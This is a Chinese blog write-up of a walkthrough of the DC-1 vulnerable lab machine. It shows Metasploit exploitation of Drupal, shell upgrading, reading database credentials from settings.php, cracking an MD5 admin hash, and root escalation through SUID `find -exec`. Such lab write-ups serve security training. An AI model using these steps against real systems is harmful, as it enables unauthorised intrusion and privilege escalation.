靶机 DC_1

DC_1

信息搜集

存活检测

image-20231022135843731

详细扫描

网页目录扫描

image-20231022142423026

网页信息搜集

  • cms 为 Drupal

    image-20231022140031062

    image-20231022140204611

    image-20231022140211818

漏洞利用

  • 使用 msf 搜索 drupal 的漏洞

    启动

    msfconsole
    

    搜索

    search drupal
    

    image-20231022142917455

  • 尝试编号为 0 的漏洞

    image-20231022143602280

    失败

  • 利用编号为 1 的漏洞

    use 1
    

    查看需要配置的选项

    show options
    

    image-20231022143040490

    设置目标 ip

    set rhost 10.4.7.145
    

    启动

    run
    
  • 成功建立连接

    image-20231022143806965

  • 获取 shell 权限

    shell
    

    image-20231022143918234

  • 回显提示符

    python -c 'import pty;pty.spawn("/bin/bash")'
    

    image-20231022143959796

  • 第一个 flag

    image-20231022144047189

  • 查看 drupal 默认配置文件

    路径

    /var/www/sites/default
    
    cat settings.php
    

    image-20231022145527644

数据库登录

  • 在 drupal 配置文件中查找到了第二个 flag 以及数据库的账密信息

    用户名:dbuser
    密码:R0ck3t
    

    image-20231022145625466

  • 成功登录数据库

    image-20231022145936963

  • 搜集有用信息

    image-20231022150028752

  • 查看 users 表

    image-20231022150654792

  • md5 解密

    密码为 53cr3t

    image-20231022150630553

  • admin 登录

    image-20231022150746661

    在 content 目录下拿到第三个 flag

    image-20231022150828508

  • 提示 perms find -exec

提权

  • 查找具有 suid 权限的命令

    具有 suid 权限的命令在使用时会以命令所有者的权限运行

    命令的所有者一般为 root

    find / -perm -4000 2>/dev/null
    

    image-20231022151340602

  • find 提权

    find \ a -exec 'bash' \;
    

    image-20231022151648735

  • bash 提权失败,尝试使用 sh

    image-20231022151804911

    成功 root

  • final flag

    image-20231022152402407

总结

  • Metasploit 漏洞利用
  • find 提权
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值